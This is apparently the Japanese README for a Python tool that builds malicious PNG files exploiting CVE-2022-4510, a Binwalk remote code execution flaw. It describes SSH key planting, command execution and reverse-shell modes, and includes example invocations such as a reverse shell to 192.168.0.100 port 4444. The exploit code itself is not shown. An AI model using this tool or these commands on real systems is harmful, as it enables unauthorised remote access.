
CVE-2022-4510 RCE Binwalk を標的としたエクスプロイトを生成する Python スクリプト。SSH、コマンド実行、リバースシェルの各オプションに対応。エクスプロイトは PNG 形式で保存されます。テストやデモンストレーションに最適です。
このスクリプトを使用すると、CVE-2022-4510 Binwalk の脆弱性を対象としたエクスプロイトを生成できます。エクスプロイトは、テストやデモンストレーションに使用できます。サポートされているオプションは、SSH、コマンド実行、リバースシェルです。
ssh: SSH 用のエクスプロイトを生成します。
file: 入力 .png ファイルのパス。pub: 公開鍵ファイルのパス。command: コマンドを実行するためのエクスプロイトを生成します。
--command: 実行するコマンド。file: 入力 .png ファイルのパス。reverse: リバースシェル用のエクスプロイトを生成します。
file: 入力 .png ファイルのパス。ip: リスナーの IP アドレス。port: リスナーのポート番号。使用例:
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
生成されたエクスプロイトは、現在のディレクトリに binwalk_exploit.png として保存されます。
このスクリプトは責任を持って、脆弱性のテストまたはデモンストレーションを行う許可を得たシステムでのみ使用してください。作者は、このスクリプトの不正または無許可の使用について一切の責任を負いません。